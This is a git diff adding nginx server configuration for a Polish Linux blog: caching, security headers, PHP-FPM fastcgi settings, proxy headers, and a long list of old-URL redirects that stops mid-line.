zcmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}@gg7w@vi_e5x_AdBnYYuq+J^qI7A5ADWagzZ6zUroSQuKHrdb+TSemC;J7*N-=cZb_8k?IN lS-QIDI=fgJ>6)0EyXrbQn!4$_S(>>S8(A2+7#bQd004uLA7lUk literal 0 HcmV?d00001 diff --git a/config/._letsencrypt.conf b/config/._letsencrypt.conf new file mode 100755 index 0000000000000000000000000000000000000000..83aeeb234a4736221349a7975e6520602a0a4080 GIT binary patch literal 212 zcmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}@gg7w@vi_e5x_AdBnYYuq+J^qI7A5ADWagzZ6zUroSQuKHrdb+TSemC;J7*N-=cZb_8k?IN lS-QIDI=fgJ>6)0EyXrbQn!4$_S(>>S8(A2+7#bQd004uLA7lUk literal 0 HcmV?d00001 diff --git a/config/._php_fastcgi.conf b/config/._php_fastcgi.conf new file mode 100755 index 0000000000000000000000000000000000000000..83aeeb234a4736221349a7975e6520602a0a4080 GIT binary patch literal 212 zcmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}@gg7w@vi_e5x_AdBnYYuq+J^qI7A5ADWagzZ6zUroSQuKHrdb+TSemC;J7*N-=cZb_8k?IN lS-QIDI=fgJ>6)0EyXrbQn!4$_S(>>S8(A2+7#bQd004uLA7lUk literal 0 HcmV?d00001 diff --git a/config/._security.conf b/config/._security.conf new file mode 100755 index 0000000000000000000000000000000000000000..83aeeb234a4736221349a7975e6520602a0a4080 GIT binary patch literal 212 zcmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}@gg7w@vi_e5x_AdBnYYuq+J^qI7A5ADWagzZ6zUroSQuKHrdb+TSemC;J7*N-=cZb_8k?IN lS-QIDI=fgJ>6)0EyXrbQn!4$_S(>>S8(A2+7#bQd004uLA7lUk literal 0 HcmV?d00001 diff --git a/config/._wordpress.conf b/config/._wordpress.conf new file mode 100755 index 0000000000000000000000000000000000000000..83aeeb234a4736221349a7975e6520602a0a4080 GIT binary patch literal 212 zcmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}@gg7w@vi_e5x_AdBnYYuq+J^qI7A5ADWagzZ6zUroSQuKHrdb+TSemC;J7*N-=cZb_8k?IN lS-QIDI=fgJ>6)0EyXrbQn!4$_S(>>S8(A2+7#bQd004uLA7lUk literal 0 HcmV?d00001 diff --git a/config/custom_linuxiarz.conf b/config/custom_linuxiarz.conf new file mode 100644 index 0000000..de53d1c --- /dev/null +++ b/config/custom_linuxiarz.conf @@ -0,0 +1,17 @@ +location ~* /sk { + return 301 https://sk.linuxiarz.pl/; +} + +location = /phpinfo/ { + auth_basic ""; + auth_basic_user_file /etc/nginx/.htpasswd; +} + +location = /ovh/ { + return 404; +} + +rewrite ^/sitemap(-+([a-zA-Z0-9_-]+))?\.xml$ "/index.php?xml_sitemap=params=$2" last; +rewrite ^/sitemap(-+([a-zA-Z0-9_-]+))?\.xml\.gz$ "/index.php?xml_sitemap=params=$2;zip=true" last; +rewrite ^/sitemap(-+([a-zA-Z0-9_-]+))?\.html$ "/index.php?xml_sitemap=params=$2;html=true" last; +rewrite ^/sitemap(-+([a-zA-Z0-9_-]+))?\.html.gz$ "/index.php?xml_sitemap=params=$2;html=true;zip=true" last; diff --git a/config/general.conf b/config/general.conf new file mode 100755 index 0000000..8c2c391 --- /dev/null +++ b/config/general.conf @@ -0,0 +1,31 @@ +# favicon.ico +location = /favicon.ico { + log_not_found off; + access_log off; +} + +# robots.txt +location = /robots.txt { + log_not_found off; + access_log off; +} + +# assets, media +location ~* \.(?:css(\.map)?|js(\.map)?|jpe?g|png|gif|ico|cur|heic|webp|tiff?|mp3|m4a|aac|ogg|midi?|wav|mp4|mov|webm|mpe?g|avi|ogv|flv|wmv)$ { + expires 7d; + access_log off; +} + +# svg, fonts +location ~* \.(?:svgz?|ttf|ttc|otf|eot|woff2?)$ { + add_header Access-Control-Allow-Origin "*"; + expires 7d; + access_log off; +} + +# gzip +gzip on; +gzip_vary on; +gzip_proxied any; +gzip_comp_level 6; +gzip_types text/plain text/css text/xml application/json application/javascript application/rss+xml application/atom+xml image/svg+xml; \ No newline at end of file diff --git a/config/header.conf b/config/header.conf new file mode 100644 index 0000000..6cf6a93 --- /dev/null +++ b/config/header.conf @@ -0,0 +1,10 @@ + add_header X-Frame-Options SAMEORIGIN; + add_header X-Content-Type-Options nosniff; + add_header X-XSS-Protection "1; mode=block"; + add_header Strict-Transport-Security "max-age=63072000; includeSubDomains; preload"; + add_header Content-Security-Policy "default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';" always; + add_header Referrer-Policy "origin"; + add_header Permissions-Policy "autoplay=(), encrypted-media=(), fullscreen=(), geolocation=(), microphone=(), midi=()"; + add_header Cross-Origin-Embedder-Policy "unsafe-none; report-to=default"; + add_header Cross-Origin-Opener-Policy "unsafe-none; report-to=default"; + add_header Cross-Origin-Resource-Policy "cross-origin"; diff --git a/config/letsencrypt.conf b/config/letsencrypt.conf new file mode 100755 index 0000000..8705582 --- /dev/null +++ b/config/letsencrypt.conf @@ -0,0 +1,4 @@ +# ACME-challenge +location ^~ /.well-known/acme-challenge/ { + root /var/www/_letsencrypt; +} \ No newline at end of file diff --git a/config/non-hotlink.conf b/config/non-hotlink.conf new file mode 100644 index 0000000..b9669b8 --- /dev/null +++ b/config/non-hotlink.conf @@ -0,0 +1,12 @@ +# Hotlinking dla obrazków/CSS/JS z wp-content +location ~* ^/wp-content/.*\.(?:png|jpe?g|gif|webp|svg|ico|css|js)$ { + + # Jeśli chcesz wpuszczać wejścia bez Referera – zostaw 'none'. + # Jeśli chcesz je blokować – usuń 'none'. + valid_referers none blocked server_names *.blog.linuxiarz.pl *.linuxiarz.pl; + + if ($invalid_referer) { return 403; } + + # normalne serwowanie + try_files $uri $uri/ =404; +} diff --git a/config/php_fastcgi.conf b/config/php_fastcgi.conf new file mode 100755 index 0000000..fb68f03 --- /dev/null +++ b/config/php_fastcgi.conf @@ -0,0 +1,16 @@ +# 404 +try_files $fastcgi_script_name =404; + +# default fastcgi_params +include fastcgi_params; + +# fastcgi settings +fastcgi_pass unix:/run/php/php8.1-fpm.sock; +fastcgi_index index.php; +fastcgi_buffers 8 16k; +fastcgi_buffer_size 32k; + +# fastcgi params +fastcgi_param DOCUMENT_ROOT $realpath_root; +fastcgi_param SCRIPT_FILENAME $realpath_root$fastcgi_script_name; +fastcgi_param PHP_ADMIN_VALUE "open_basedir=$base/:/usr/lib/php/:/tmp/"; diff --git a/config/php_fastcgi5_6.conf b/config/php_fastcgi5_6.conf new file mode 100644 index 0000000..9ff575c --- /dev/null +++ b/config/php_fastcgi5_6.conf @@ -0,0 +1,16 @@ +# 404 +try_files $fastcgi_script_name =404; + +# default fastcgi_params +include fastcgi_params; + +# fastcgi settings +fastcgi_pass unix:/run/php/php5.6-fpm.sock; +fastcgi_index index.php; +fastcgi_buffers 8 16k; +fastcgi_buffer_size 32k; + +# fastcgi params +fastcgi_param DOCUMENT_ROOT $realpath_root; +fastcgi_param SCRIPT_FILENAME $realpath_root$fastcgi_script_name; +fastcgi_param PHP_ADMIN_VALUE "open_basedir=$base/:/usr/lib/php/:/tmp/"; diff --git a/config/php_fastcgi7_4.conf b/config/php_fastcgi7_4.conf new file mode 100755 index 0000000..786786e --- /dev/null +++ b/config/php_fastcgi7_4.conf @@ -0,0 +1,16 @@ +# 404 +try_files $fastcgi_script_name =404; + +# default fastcgi_params +include fastcgi_params; + +# fastcgi settings +fastcgi_pass unix:/run/php/php7.4-fpm.sock; +fastcgi_index index.php; +fastcgi_buffers 8 16k; +fastcgi_buffer_size 32k; + +# fastcgi params +fastcgi_param DOCUMENT_ROOT $realpath_root; +fastcgi_param SCRIPT_FILENAME $realpath_root$fastcgi_script_name; +fastcgi_param PHP_ADMIN_VALUE "open_basedir=$base/:/usr/lib/php/:/tmp/"; diff --git a/config/php_fastcgi8_1.conf b/config/php_fastcgi8_1.conf new file mode 100755 index 0000000..fb68f03 --- /dev/null +++ b/config/php_fastcgi8_1.conf @@ -0,0 +1,16 @@ +# 404 +try_files $fastcgi_script_name =404; + +# default fastcgi_params +include fastcgi_params; + +# fastcgi settings +fastcgi_pass unix:/run/php/php8.1-fpm.sock; +fastcgi_index index.php; +fastcgi_buffers 8 16k; +fastcgi_buffer_size 32k; + +# fastcgi params +fastcgi_param DOCUMENT_ROOT $realpath_root; +fastcgi_param SCRIPT_FILENAME $realpath_root$fastcgi_script_name; +fastcgi_param PHP_ADMIN_VALUE "open_basedir=$base/:/usr/lib/php/:/tmp/"; diff --git a/config/php_fastcgi_webmail.conf b/config/php_fastcgi_webmail.conf new file mode 100755 index 0000000..de08ae4 --- /dev/null +++ b/config/php_fastcgi_webmail.conf @@ -0,0 +1,23 @@ +# Split PATH_INFO dla static.php i innych +fastcgi_split_path_info ^(.+?\.php)(/.*)$; + +# WAŻNE: Przypisz do zmiennej PRZED try_files +set $path_info $fastcgi_path_info; + +# 404 +try_files $fastcgi_script_name =404; + +# default fastcgi_params +include fastcgi_params; + +# fastcgi settings +fastcgi_pass unix:/run/php/php-fpm-mail.sock; +fastcgi_index index.php; +fastcgi_buffers 8 16k; +fastcgi_buffer_size 32k; + +# fastcgi params +fastcgi_param DOCUMENT_ROOT $realpath_root; +fastcgi_param SCRIPT_FILENAME $realpath_root$fastcgi_script_name; +fastcgi_param PATH_INFO $path_info; +fastcgi_param PHP_ADMIN_VALUE "open_basedir=$base/:/usr/lib/php/:/tmp/:/etc/enigma:/run/current-system/sw/bin/gpg2:/usr/bin/gpg:/run/current-system/sw/bin/gpgconf:/usr/bin/gpg-agent:/usr/bin/gpgconf:/run/current-system/sw/bin/gpgconf"; diff --git a/config/proxy.conf b/config/proxy.conf new file mode 100644 index 0000000..cac97b2 --- /dev/null +++ b/config/proxy.conf @@ -0,0 +1,20 @@ +proxy_http_version 1.1; +proxy_cache_bypass $http_upgrade; + +# Proxy headers +proxy_set_header Upgrade $http_upgrade; +proxy_set_header Connection "upgrade"; +proxy_set_header Host $host; +proxy_set_header X-Real-IP $remote_addr; +proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; +proxy_set_header X-Forwarded-Proto $scheme; +proxy_set_header X-Forwarded-Host $host; +proxy_set_header X-Forwarded-Port $server_port; +more_clear_headers "X-Pingback"; +more_clear_headers "X-Cache"; + + +# Proxy timeouts +proxy_connect_timeout 60s; +proxy_send_timeout 60s; +proxy_read_timeout 60s; diff --git a/config/rewrites.conf b/config/rewrites.conf new file mode 100644 index 0000000..08e4031 --- /dev/null +++ b/config/rewrites.conf @@ -0,0 +1,682 @@ +rewrite ^/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/$ https://blog.linuxiarz.pl/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/ permanent; +rewrite ^/2354/sofarsolar-ktl-x-i-logger-lsw-3-lse-3-grafana-influxdb/$ https://blog.linuxiarz.pl/2354/sofarsolar-ktl-x-i-logger-lsw-3-lse-3-grafana-influxdb/ permanent; +rewrite ^/2263/przywracanie-hasla-do-kontrolera-unifi/$ https://blog.linuxiarz.pl/2263/przywracanie-hasla-do-kontrolera-unifi/ permanent; +rewrite ^/857/huawei-e3131-aero2-mikrotik-routeros/$ https://blog.linuxiarz.pl/857/huawei-e3131-aero2-mikrotik-routeros/ permanent; +rewrite ^/2253/zalatany-apache-warto-zrobic-update/$ https://blog.linuxiarz.pl/2253/zalatany-apache-warto-zrobic-update/ permanent; +rewrite ^/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/$ https://blog.linuxiarz.pl/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/ permanent; +rewrite ^/2053/instalacja-serwera-teamspeak3-bot-muzyczny-baza-mysql-debian-8-ubuntu-14-04-ubuntu-16-04/$ https://blog.linuxiarz.pl/2053/instalacja-serwera-teamspeak3-bot-muzyczny-baza-mysql-debian-8-ubuntu-14-04-ubuntu-16-04/ permanent; +rewrite ^/2172/vmware-esxi-6-0-monitoring-zabbixem/$ https://blog.linuxiarz.pl/2172/vmware-esxi-6-0-monitoring-zabbixem/ permanent; +rewrite ^/2149/nginx-z-http2-oraz-spdy-jednoczesnie-to-mozliwe/$ https://blog.linuxiarz.pl/2149/nginx-z-http2-oraz-spdy-jednoczesnie-to-mozliwe/ permanent; +rewrite ^/1992/wydajny-i-szybki-sklep-prestashop/$ https://blog.linuxiarz.pl/1992/wydajny-i-szybki-sklep-prestashop/ permanent; +rewrite ^/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/$ https://blog.linuxiarz.pl/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/ permanent; +rewrite ^/2131/nginx-1-10-0-stable-i-nginx-1-11-0-mainline/$ https://blog.linuxiarz.pl/2131/nginx-1-10-0-stable-i-nginx-1-11-0-mainline/ permanent; +rewrite ^/1874/centos-6-nginx-mariadb-phpmyadmin/$ https://blog.linuxiarz.pl/1874/centos-6-nginx-mariadb-phpmyadmin/ permanent; +rewrite ^/2066/certyfikat-ssl-z-letsencrypt-i-autoodnawianie/$ https://blog.linuxiarz.pl/2066/certyfikat-ssl-z-letsencrypt-i-autoodnawianie/ permanent; +rewrite ^/1921/wydajny-wordpress-na-wlasnym-serwerze/$ https://blog.linuxiarz.pl/1921/wydajny-wordpress-na-wlasnym-serwerze/ permanent; +rewrite ^/2082/lemp-na-ubuntu-16-04-nginx-mariadb-php7-memcache/$ https://blog.linuxiarz.pl/2082/lemp-na-ubuntu-16-04-nginx-mariadb-php7-memcache/ permanent; +rewrite ^/300/termometr-ds1820/$ https://blog.linuxiarz.pl/300/termometr-ds1820/ permanent; +rewrite ^/1356/centos-7-instalacja-serwera-ftp/$ https://blog.linuxiarz.pl/1356/centos-7-instalacja-serwera-ftp/ permanent; +rewrite ^/2045/nginx-1-9-14-na-i386-amd64-armv7-armhf/$ https://blog.linuxiarz.pl/2045/nginx-1-9-14-na-i386-amd64-armv7-armhf/ permanent; +rewrite ^/2032/tengine-chinski-zmodyfikowany-serwer-nginx/$ https://blog.linuxiarz.pl/2032/tengine-chinski-zmodyfikowany-serwer-nginx/ permanent; +rewrite ^/2023/wirtualizacja-kvm-interfejs-web/$ https://blog.linuxiarz.pl/2023/wirtualizacja-kvm-interfejs-web/ permanent; +rewrite ^/1986/nginx-1-9-12-z-modulami-na-debian-ubuntu-centos-i-innych/$ https://blog.linuxiarz.pl/1986/nginx-1-9-12-z-modulami-na-debian-ubuntu-centos-i-innych/ permanent; +rewrite ^/1960/debian-8-perfekcyjny-serwer-www/$ https://blog.linuxiarz.pl/1960/debian-8-perfekcyjny-serwer-www/ permanent; +rewrite ^/1911/nginx-1-9-11-z-modulami-na-debian-ubuntu-centos-i-innych/$ https://blog.linuxiarz.pl/1911/nginx-1-9-11-z-modulami-na-debian-ubuntu-centos-i-innych/ permanent; +rewrite ^/1781/serwer-www-w-pigulce-centos-7/$ https://blog.linuxiarz.pl/1781/serwer-www-w-pigulce-centos-7/ permanent; +rewrite ^/1966/mailpile-klient-imap-z-obsluga-pgp/$ https://blog.linuxiarz.pl/1966/mailpile-klient-imap-z-obsluga-pgp/ permanent; +rewrite ^/1956/apache-2-4-18-na-debian-ubuntu/$ https://blog.linuxiarz.pl/1956/apache-2-4-18-na-debian-ubuntu/ permanent; +rewrite ^/293/stawiamy-serwer-cs-source-steam/$ https://blog.linuxiarz.pl/293/stawiamy-serwer-cs-source-steam/ permanent; +rewrite ^/1854/nginx-1-9-10-i-nginx-1-8-1-dla-debian-ubuntu-centos-fedora-opensuse/$ https://blog.linuxiarz.pl/1854/nginx-1-9-10-i-nginx-1-8-1-dla-debian-ubuntu-centos-fedora-opensuse/ permanent; +rewrite ^/1618/ubuntu-serwer-www-w-pigulce/$ https://blog.linuxiarz.pl/1618/ubuntu-serwer-www-w-pigulce/ permanent; +rewrite ^/1640/serwer-www-w-pigulce-na-debian-8/$ https://blog.linuxiarz.pl/1640/serwer-www-w-pigulce-na-debian-8/ permanent; +rewrite ^/1899/cozy-cloud-twoja-chmura-w-sieci/$ https://blog.linuxiarz.pl/1899/cozy-cloud-twoja-chmura-w-sieci/ permanent; +rewrite ^/1896/htop-2-0-zostal-opublikowany/$ https://blog.linuxiarz.pl/1896/htop-2-0-zostal-opublikowany/ permanent; +rewrite ^/1827/routing-w-multimedii/$ https://blog.linuxiarz.pl/1827/routing-w-multimedii/ permanent; +rewrite ^/1834/instalacja-gentoofuntoo/$ https://blog.linuxiarz.pl/1834/instalacja-gentoofuntoo/ permanent; +rewrite ^/1820/usuwanie-starych-kerneli-w-ubuntu/$ https://blog.linuxiarz.pl/1820/usuwanie-starych-kerneli-w-ubuntu/ permanent; +rewrite ^/1807/prywatny-serwer-world-of-warcraft-na-systemie-linux/$ https://blog.linuxiarz.pl/1807/prywatny-serwer-world-of-warcraft-na-systemie-linux/ permanent; +rewrite ^/1802/nginx-z-dodatkami-na-freebsd/$ https://blog.linuxiarz.pl/1802/nginx-z-dodatkami-na-freebsd/ permanent; +rewrite ^/1796/opensuse-i-serwer-www-z-nginx/$ https://blog.linuxiarz.pl/1796/opensuse-i-serwer-www-z-nginx/ permanent; +rewrite ^/722/kompilacja-minidlna-ze-zrodel/$ https://blog.linuxiarz.pl/722/kompilacja-minidlna-ze-zrodel/ permanent; +rewrite ^/1761/seagate-i-smutna-historia/$ https://blog.linuxiarz.pl/1761/seagate-i-smutna-historia/ permanent; +rewrite ^/1761/seagate-i-smutna-hostoria/$ https://blog.linuxiarz.pl/1761/seagate-i-smutna-historia/ permanent; +rewrite ^/1732/centos-7-i-nginx-mariadb-php5-fpm/$ https://blog.linuxiarz.pl/1732/centos-7-i-nginx-mariadb-php5-fpm/ permanent; +rewrite ^/1748/instalacja-klucza-dkim-i-amavis/$ https://blog.linuxiarz.pl/1748/instalacja-klucza-dkim-i-amavis/ permanent; +rewrite ^/1745/xcache-akcelerator-php/$ https://blog.linuxiarz.pl/1745/xcache-akcelerator-php/ permanent; +rewrite ^/1738/kompilacja-php-5-6-15-z-modulami/$ https://blog.linuxiarz.pl/1738/kompilacja-php-5-6-15-z-modulami/ permanent; +rewrite ^/1723/fedora-i-nginx-z-google-pagespeed/$ https://blog.linuxiarz.pl/1723/fedora-i-nginx-z-google-pagespeed/ permanent; +rewrite ^/1720/nowa-wersja-nginx-1-9-7/$ https://blog.linuxiarz.pl/1720/nowa-wersja-nginx-1-9-7/ permanent; +rewrite ^/1713/downgrade-systemu-windows-8-1-enterprise-do-windows-8-1-pro/$ https://blog.linuxiarz.pl/1713/downgrade-systemu-windows-8-1-enterprise-do-windows-8-1-pro/ permanent; +rewrite ^/1348/archlinux-jako-serwer-hostingowy-nginx-mariadb-ftp/$ https://blog.linuxiarz.pl/1348/archlinux-jako-serwer-hostingowy-nginx-mariadb-ftp/ permanent; +rewrite ^/1633/nowa-wersja-nginx-1-9-6/$ https://blog.linuxiarz.pl/1633/nowa-wersja-nginx-1-9-6/ permanent; +rewrite ^/1684/litespeed-instalacja-na-ubuntu-15-04/$ https://blog.linuxiarz.pl/1684/litespeed-instalacja-na-ubuntu-15-04/ permanent; +rewrite ^/1688/lighttpd-z-nginx-i-varnishem-na-ubuntu/$ https://blog.linuxiarz.pl/1688/lighttpd-z-nginx-i-varnishem-na-ubuntu/ permanent; +rewrite ^/1694/lighttpd-z-nginx-i-varnishem-na-debian-8/$ https://blog.linuxiarz.pl/1694/lighttpd-z-nginx-i-varnishem-na-debian-8/ permanent; +rewrite ^/1665/php7-rc6-na-debian-8-jessie-testujemy/$ https://blog.linuxiarz.pl/1665/php7-rc6-na-debian-8-jessie-testujemy/ permanent; +rewrite ^/1363/nginx-1-9-4-z-obsluga-protokolu-http2/$ https://blog.linuxiarz.pl/1363/nginx-1-9-4-z-obsluga-protokolu-http2/ permanent; +rewrite ^/383/manager-pobierania-aria2-konfiguracja/$ https://blog.linuxiarz.pl/383/manager-pobierania-aria2-konfiguracja/ permanent; +rewrite ^/1612/nginx-1-8-0-vts-pagespeed-na-debian-7/$ https://blog.linuxiarz.pl/1612/nginx-1-8-0-vts-pagespeed-na-debian-7/ permanent; +rewrite ^/1586/ubuntu-debian-i-inne-kompilacja-nginx/$ https://blog.linuxiarz.pl/1586/ubuntu-debian-i-inne-kompilacja-nginx/ permanent; +rewrite ^/1563/mail-in-a-box-czyli-kompleksowa-poczta-e-mail/$ https://blog.linuxiarz.pl/1563/mail-in-a-box-czyli-kompleksowa-poczta-e-mail/ permanent; +rewrite ^/1571/mailcow-system-pocztowy-w-10-minut/$ https://blog.linuxiarz.pl/1571/mailcow-system-pocztowy-w-10-minut/ permanent; +rewrite ^/1580/nginx-1-9-4-i-1-9-5-z-najnowszym-pagespeedem-i-vtsem/$ https://blog.linuxiarz.pl/1580/nginx-1-9-4-i-1-9-5-z-najnowszym-pagespeedem-i-vtsem/ permanent; +rewrite ^/1083/debian-7-nginx-php5-mariadb-10-phpmyadmin/$ https://blog.linuxiarz.pl/1083/debian-7-nginx-php5-mariadb-10-phpmyadmin/ permanent; +rewrite ^/1526/instalacja-php-5-6-14-na-ubuntu-15-04/$ https://blog.linuxiarz.pl/1526/instalacja-php-5-6-14-na-ubuntu-15-04/ permanent; +rewrite ^/1519/apache2-nginx-varnish-na-ubuntu-15-04/$ https://blog.linuxiarz.pl/1519/apache2-nginx-varnish-na-ubuntu-15-04/ permanent; +rewrite ^/1337/centos-7-nginx-php5-ftp-kompletny-serwer-www/$ https://blog.linuxiarz.pl/1337/centos-7-nginx-php5-ftp-kompletny-serwer-www/ permanent; +rewrite ^/1247/gotowy-nginx-1-9-3-pagespeed-php5-fpm/$ https://blog.linuxiarz.pl/1247/gotowy-nginx-1-9-3-pagespeed-php5-fpm/ permanent; +rewrite ^/1308/lighttpd-z-php5-fpm-i-varnishem/$ https://blog.linuxiarz.pl/1308/lighttpd-z-php5-fpm-i-varnishem/ permanent; +rewrite ^/1315/apache-2-php5-fpm-varnish/$ https://blog.linuxiarz.pl/1315/apache-2-php5-fpm-varnish/ permanent; +rewrite ^/1435/nginx-na-ubuntu-14-04-15-04-i-15-10-out-of-the-box/$ https://blog.linuxiarz.pl/1435/nginx-na-ubuntu-14-04-15-04-i-15-10-out-of-the-box/ permanent; +rewrite ^/1442/nginx-na-debianie-7-i-8-out-of-the-box/$ https://blog.linuxiarz.pl/1442/nginx-na-debianie-7-i-8-out-of-the-box/ permanent; +rewrite ^/1446/lighttpd-z-php5-fpm-varnishem-i-mariadb-na-debianie-8/$ https://blog.linuxiarz.pl/1446/lighttpd-z-php5-fpm-varnishem-i-mariadb-na-debianie-8/ permanent; +rewrite ^/1499/apache2-nginx-varnish-na-debianie-8/$ https://blog.linuxiarz.pl/1499/apache2-nginx-varnish-na-debianie-8/ permanent; +rewrite ^/1489/maradns-lekki-i-prosty-serwer-dns/$ https://blog.linuxiarz.pl/1489/maradns-lekki-i-prosty-serwer-dns/ permanent; +rewrite ^/1479/prestashop-na-nginx-szybkie-i-bezproblemowe/$ https://blog.linuxiarz.pl/1479/prestashop-na-nginx-szybkie-i-bezproblemowe/ permanent; +rewrite ^/341/aria2-na-linux-debian/$ https://blog.linuxiarz.pl/341/aria2-na-linux-debian/ permanent; +rewrite ^/1472/varnish-4-cache-ktory-nie-gryzie/$ https://blog.linuxiarz.pl/1472/varnish-4-cache-ktory-nie-gryzie/ permanent; +rewrite ^/1465/apache-2-4-10-ubuntu-15-04-i-googlepagespeed/$ https://blog.linuxiarz.pl/1465/apache-2-4-10-ubuntu-15-04-i-googlepagespeed/ permanent; +rewrite ^/1458/drupal-i-nginx/$ https://blog.linuxiarz.pl/1458/drupal-i-nginx/ permanent; +rewrite ^/1451/uruchomienie-systemu-cms-drupal-na-lighttpd/$ https://blog.linuxiarz.pl/1451/uruchomienie-systemu-cms-drupal-na-lighttpd/ permanent; +rewrite ^/1425/postfix-blokada-nadawcow-i-domen/$ https://blog.linuxiarz.pl/1425/postfix-blokada-nadawcow-i-domen/ permanent; +rewrite ^/1421/aktualizacja-debiana-8-jessie-do-debiana-stretch/$ https://blog.linuxiarz.pl/1421/aktualizacja-debiana-8-jessie-do-debiana-stretch/ permanent; +rewrite ^/1403/ubuntu-14-04-i-zentyal/$ https://blog.linuxiarz.pl/1403/ubuntu-14-04-i-zentyal/ permanent; +rewrite ^/1390/postfix-sprawdzanie-rekordow-spf-nadawcow/$ https://blog.linuxiarz.pl/1390/postfix-sprawdzanie-rekordow-spf-nadawcow/ permanent; +rewrite ^/1385/nginx-1-9-4-z-modulem-vts-czyli-statystyki-vhosta/$ https://blog.linuxiarz.pl/1385/nginx-1-9-4-z-modulem-vts-czyli-statystyki-vhosta/ permanent; +rewrite ^/1376/minimalistyczne-apache-2-4-16-na-ubuntu-debianie/$ https://blog.linuxiarz.pl/1376/minimalistyczne-apache-2-4-16-na-ubuntu-debianie/ permanent; +rewrite ^/1331/kompilacja-nginx-1-9-4-z-modulem-pagespeed-na-centos-7/$ https://blog.linuxiarz.pl/1331/kompilacja-nginx-1-9-4-z-modulem-pagespeed-na-centos-7/ permanent; +rewrite ^/1297/lemp-ubuntu-15-04-szybko-i-bezbolesnie/$ https://blog.linuxiarz.pl/1297/lemp-ubuntu-15-04-szybko-i-bezbolesnie/ permanent; +rewrite ^/1324/upgrade-ubuntu-15-04-do-wersji-15-10/$ https://blog.linuxiarz.pl/1324/upgrade-ubuntu-15-04-do-wersji-15-10/ permanent; +rewrite ^/1290/hhvm-maszyna-wirtualna-z-kompilatorem-jit-dla-php/$ https://blog.linuxiarz.pl/1290/hhvm-maszyna-wirtualna-z-kompilatorem-jit-dla-php/ permanent; +rewrite ^/1221/kompilacja-nginx-1-9-3-google-page-speed/$ https://blog.linuxiarz.pl/1221/kompilacja-nginx-1-9-3-google-page-speed/ permanent; +rewrite ^/1201/virtualbox-na-fedora-20-21-22/$ https://blog.linuxiarz.pl/1201/virtualbox-na-fedora-20-21-22/ permanent; +rewrite ^/1213/aktualizacja-apache2-do-wersji-2-4-12/$ https://blog.linuxiarz.pl/1213/aktualizacja-apache2-do-wersji-2-4-12/ permanent; +rewrite ^/1231/aktualizacja-bazy-danych/$ https://blog.linuxiarz.pl/1231/aktualizacja-bazy-danych/ permanent; +rewrite ^/1236/wirtualne-maszyny-bridge-mode-vmware-w-ovh/$ https://blog.linuxiarz.pl/1236/wirtualne-maszyny-bridge-mode-vmware-w-ovh/ permanent; +rewrite ^/1257/ccze-koloryzacja-logow-i-prezentacja-w-html/$ https://blog.linuxiarz.pl/1257/ccze-koloryzacja-logow-i-prezentacja-w-html/ permanent; +rewrite ^/1267/mageia5-czyli-mandriva-w-nowej-odslonie/$ https://blog.linuxiarz.pl/1267/mageia5-czyli-mandriva-w-nowej-odslonie/ permanent; +rewrite ^/1186/panel-hostingowy-zpanel-na-centos-6-6/$ https://blog.linuxiarz.pl/1186/panel-hostingowy-zpanel-na-centos-6-6/ permanent; +rewrite ^/1176/serwer-teamspeak-3-na-freebsd-10-1/$ https://blog.linuxiarz.pl/1176/serwer-teamspeak-3-na-freebsd-10-1/ permanent; +rewrite ^/1166/instalacja-fedora-core-22-na-virtual-box-video/$ https://blog.linuxiarz.pl/1166/instalacja-fedora-core-22-na-virtual-box-video/ permanent; +rewrite ^/1159/lemp-centos-7/$ https://blog.linuxiarz.pl/1159/lemp-centos-7/ permanent; +rewrite ^/1145/automatyczna-instalacja-rtorrent-rutorrent/$ https://blog.linuxiarz.pl/1145/automatyczna-instalacja-rtorrent-rutorrent/ permanent; +rewrite ^/1140/centos-7-htop/$ https://blog.linuxiarz.pl/1140/centos-7-htop/ permanent; +rewrite ^/1134/statystyki-serwera-www-apache2-w-czasie-rzeczywistym/$ https://blog.linuxiarz.pl/1134/statystyki-serwera-www-apache2-w-czasie-rzeczywistym/ permanent; +rewrite ^/1098/open-game-panel-panel-gier-online/$ https://blog.linuxiarz.pl/1098/open-game-panel-panel-gier-online/ permanent; +rewrite ^/1105/instalacja-owncloud-apache-mariadb/$ https://blog.linuxiarz.pl/1105/instalacja-owncloud-apache-mariadb/ permanent; +rewrite ^/876/support-lenovo-i-mile-zaskoczenie/$ https://blog.linuxiarz.pl/876/support-lenovo-i-mile-zaskoczenie/ permanent; +rewrite ^/887/moja-siec-domowa/$ https://blog.linuxiarz.pl/887/moja-siec-domowa/ permanent; +rewrite ^/919/tekst-przed-zalogowaniem-do-konsoli/$ https://blog.linuxiarz.pl/919/tekst-przed-zalogowaniem-do-konsoli/ permanent; +rewrite ^/924/butterfly-czyli-konsola-w-przegladarce/$ https://blog.linuxiarz.pl/924/butterfly-czyli-konsola-w-przegladarce/ permanent; +rewrite ^/931/mtr-alternatywa-dla-traceroute/$ https://blog.linuxiarz.pl/931/mtr-alternatywa-dla-traceroute/ permanent; +rewrite ^/945/auto-backup-baz-danych-mysql/$ https://blog.linuxiarz.pl/945/auto-backup-baz-danych-mysql/ permanent; +rewrite ^/949/serwer-team-speak-3-zaktualizowany/$ https://blog.linuxiarz.pl/949/serwer-team-speak-3-zaktualizowany/ permanent; +rewrite ^/953/fail2ban-musisz-to-miec/$ https://blog.linuxiarz.pl/953/fail2ban-musisz-to-miec/ permanent; +rewrite ^/960/proftp-wirtualny-uzytkownik/$ https://blog.linuxiarz.pl/960/proftp-wirtualny-uzytkownik/ permanent; +rewrite ^/967/wlaczenie-userdir-w-apache2/$ https://blog.linuxiarz.pl/967/wlaczenie-userdir-w-apache2/ permanent; +rewrite 